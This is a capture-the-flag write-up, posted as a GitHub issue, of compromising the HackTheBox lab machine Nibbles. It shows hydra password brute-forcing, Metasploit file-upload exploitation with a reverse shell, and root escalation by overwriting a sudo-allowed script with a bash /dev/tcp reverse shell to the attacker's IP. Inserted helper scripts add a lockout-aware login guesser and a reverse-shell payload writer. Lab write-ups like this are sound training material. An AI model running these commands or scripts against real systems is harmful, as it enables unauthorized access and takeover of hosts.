roaris / ctf-log


HackTheBox: Nibbles (Machine Easy) #23

Open roaris opened 6 months ago

roaris commented 6 months ago

https://app.hackthebox.com/machines/Nibbles

$ nmap -sC -sV -Pn 10.10.10.75
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-10 21:50 JST
Nmap scan report for 10.10.10.75
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.27 seconds
roaris commented 6 months ago

[screenshot]

A comment mentions the /nibbleblog/ directory, so I visited /nibbleblog and something that looks like an admin interface appeared.

[screenshot]

Apparently there is a CMS called nibbleblog.

roaris commented 6 months ago

Searching for nibbleblog turned up https://github.com/dix0nym/CVE-2015-6967. Apparently it uploads a file through admin.php.

Actually visiting /nibbleblog/admin.php shows a login screen. There are no credentials for it in SecLists:

$ find /usr/share/SecLists -iname '*nibble*'
roaris commented 6 months ago

Let's try hydra: https://qiita.com/Hashibirokou/items/411a11779987043a5095 For now the username is fixed to admin.

$ hydra -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form '/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-10 22:22:35
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.10.75:80/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password
[80][http-post-form] host: 10.10.10.75   login: admin   password: 12345
[STATUS] attack finished for 10.10.10.75 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-10 22:22:38

It looks like admin/12345 logs in. When I went to actually log in I was blocked, so I restarted the machine.

[screenshot]

roaris commented 6 months ago

admin/12345 did not log in. After repeated login attempts you get the Nibbleblog security error shown above rather than a login-failed message, so hydra made a wrong call.
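The false positive above comes from how hydra's http-post-form module decides: "failure string absent" is taken as success, so the moment the application swaps its failure page for a lockout page, the next guess is reported as valid. The following is an added example, not code from the original post, showing the same check done with three outcomes so a guessing loop stops on lockout instead of mislabelling it. The response bodies are constructed samples trimmed to the markers that matter, and the "Dashboard" success marker is an assumption about what a real login returns.

```shell
# Added example: three-state classification of a Nibbleblog admin.php login response.
# Constructed sample bodies (not captured from the box), reduced to the relevant markers.
RESP_FAIL='<div class="alert">Incorrect username or password</div>'
RESP_LOCK='<h1>Nibbleblog security error</h1><p>Blocked access</p>'
RESP_OK='<title>Nibbleblog - Dashboard</title>'   # success marker is an assumption

# hydra-style two-state check: anything without the failure string counts as a hit
hydra_style() {
  case "$1" in
    *"Incorrect username or password"*) echo failure ;;
    *)                                  echo success ;;
  esac
}

# three-state check: the lockout page is its own outcome, neither success nor failure
classify_response() {
  case "$1" in
    *"Incorrect username or password"*) echo failure ;;
    *"Nibbleblog security error"*)      echo lockout ;;
    *"Dashboard"*)                      echo success ;;
    *)                                  echo unknown ;;
  esac
}

# Live helper (not executed offline): POST one guess with the field names hydra was given.
try_login() {
  body=$(curl -s -L --data-urlencode "username=$2" --data-urlencode "password=$3" \
           "http://$1/nibbleblog/admin.php")
  classify_response "$body"
}

# Walk a wordlist, stopping on the first success or the first lockout.
# Usage: guess_passwords 10.10.10.75 admin /usr/share/wordlists/rockyou.txt
guess_passwords() {
  while IFS= read -r pw; do
    result=$(try_login "$1" "$2" "$pw")
    case "$result" in
      success) echo "valid: $2/$pw"; return 0 ;;
      lockout) echo "locked out at '$pw'; wait or change source address" >&2; return 2 ;;
    esac
  done < "$3"
  return 1
}

echo "hydra-style on the lockout page: $(hydra_style "$RESP_LOCK")"        # success (false positive)
echo "three-state on the lockout page: $(classify_response "$RESP_LOCK")"  # lockout
```

With hydra itself the equivalent fix is to give http-post-form a success condition (`S=<string>` in place of the failure string) so that an unexpected page is not mistaken for a login.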

roaris commented 6 months ago

Run gobuster. Without appending /nibbleblog it finds almost nothing.

$ gobuster dir --url http://10.10.10.75/nibbleblog --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.75/nibbleblog
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/plugins              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/README               (Status: 200) [Size: 4628]
/languages            (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
Progress: 9452 / 87665 (10.78%)

Directory listing is enabled, so I can walk through the tree, but no credentials turn up.

The writeup says admin/nibbles (you apparently just have to guess it). No way.

roaris commented 6 months ago

Use multi/http/nibbleblog_file_upload.

msf6 > search nibble

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload

msf6 > use exploit/multi/http/nibbleblog_file_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/nibbleblog_file_upload) > options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the web application
   USERNAME                    yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.23.73.202    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
RHOSTS => 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI nibbleblog
TARGETURI => nibbleblog
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.16.5
LHOST => 10.10.16.5
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.16.5:4444
[*] Sending stage (39927 bytes) to 10.10.10.75
[+] Deleted image.php
[*] Meterpreter session 1 opened (10.10.16.5:4444 -> 10.10.10.75:44882) at 2024-03-10 23:05:59 +0900

meterpreter > shell
Process 1630 created.
Channel 0 created.

whoami
nibbler

No prompt appears.

(Addendum) bash -i brings up a prompt.

roaris commented 6 months ago

user.txt was in /home/nibbler.

Could not move into /root.

roaris commented 6 months ago

Check sudo -l. It lists the commands the invoking user is allowed to run with sudo: https://atmarkit.itmedia.co.jp/ait/articles/1611/28/news036.html

sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

There is a personal.zip in /home/nibbler; unzipping it produces monitor.sh.

ls
personal.zip
user.txt
unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh

I don't know what monitor.sh is for, but if I rewrite it into a reverse-shell script and run it with sudo I should get a root reverse shell.

roaris commented 6 months ago

Tried the one from https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#bash-tcp but it does not work (it works without sudo).

nibbler@Nibbles:/home/nibbler$ echo "bash -i >& /dev/tcp/10.10.16.5/4242 0>&1" > personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ sudo ./personal/stuff/monitor.sh
sudo ./personal/stuff/monitor.sh
/home/nibbler/personal/stuff/monitor.sh: 2: /home/nibbler/personal/stuff/monitor.sh: Syntax error: Bad fd number

Why it does not work is a mystery, but since it runs as root anyway, bash -i was enough.

nibbler@Nibbles:/home/nibbler$ echo "bash -i" > personal/stuff/monitor.sh
echo "bash -i" > personal/stuff/monitor.sh
nibbler@Nibbles:/home/nibbler$ sudo personal/stuff/monitor.sh
sudo personal/stuff/monitor.sh
bash: cannot set terminal process group (1330): Inappropriate ioctl for device
bash: no job control in this shell
root@Nibbles:/home/nibbler# whoami
whoami
root

root.txt was in /root.
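The "Syntax error: Bad fd number" above is dash's parser complaining about bash's `>&` redirection. sudo executes the file directly, and a file with no `#!` line falls back to /bin/sh, which on Ubuntu 16.04 is dash; run from an interactive bash without sudo, the same shebang-less file is executed by bash itself, which is why it worked there. The following is an added example, not code from the original post, that writes the monitor.sh replacement with an explicit bash shebang and checks it before the one-shot sudo run. LHOST and LPORT default to the values used in the write-up; the checks are my own, and the payload is never executed by this script.

```shell
# Added example: build a monitor.sh replacement that sudo will hand to bash, not /bin/sh.
LHOST=${LHOST:-10.10.16.5}   # attacker address used in the write-up
LPORT=${LPORT:-4242}

# Write the replacement script; the shebang must be the very first line of the file.
write_payload() {
  printf '#!/bin/bash\n# reverse shell back to %s:%s over bash /dev/tcp\nbash -i >& /dev/tcp/%s/%s 0>&1\n' \
    "$LHOST" "$LPORT" "$LHOST" "$LPORT" > "$1"
  chmod +x "$1"
}

# Check 1: the first line is a bash shebang, so execve via sudo picks bash.
has_bash_shebang() {
  [ "$(head -n 1 "$1")" = '#!/bin/bash' ]
}

# Check 2: bash -n parses the file without executing it; skip when bash is absent.
bash_syntax_ok() {
  command -v bash >/dev/null 2>&1 || return 0
  bash -n "$1" 2>/dev/null
}

# Offline demo: write to a temp dir, run both checks, show the result.
demo() {
  dir=$(mktemp -d)
  write_payload "$dir/monitor.sh"
  if has_bash_shebang "$dir/monitor.sh" && bash_syntax_ok "$dir/monitor.sh"; then
    echo "payload parses under bash:"
    cat "$dir/monitor.sh"
  else
    echo "payload check failed" >&2
  fi
  rm -rf "$dir"
}
demo

# On the box (not run here); the sudoers entry is for the exact path, so use it verbatim:
#   write_payload /home/nibbler/personal/stuff/monitor.sh
#   nc -lvnp 4242                                    # on the attacker side first
#   sudo /home/nibbler/personal/stuff/monitor.sh
```

The same root cause explains why `bash -i` alone worked: dash has no trouble with that line, and sudo's fallback to /bin/sh simply starts bash as root attached to the existing channel.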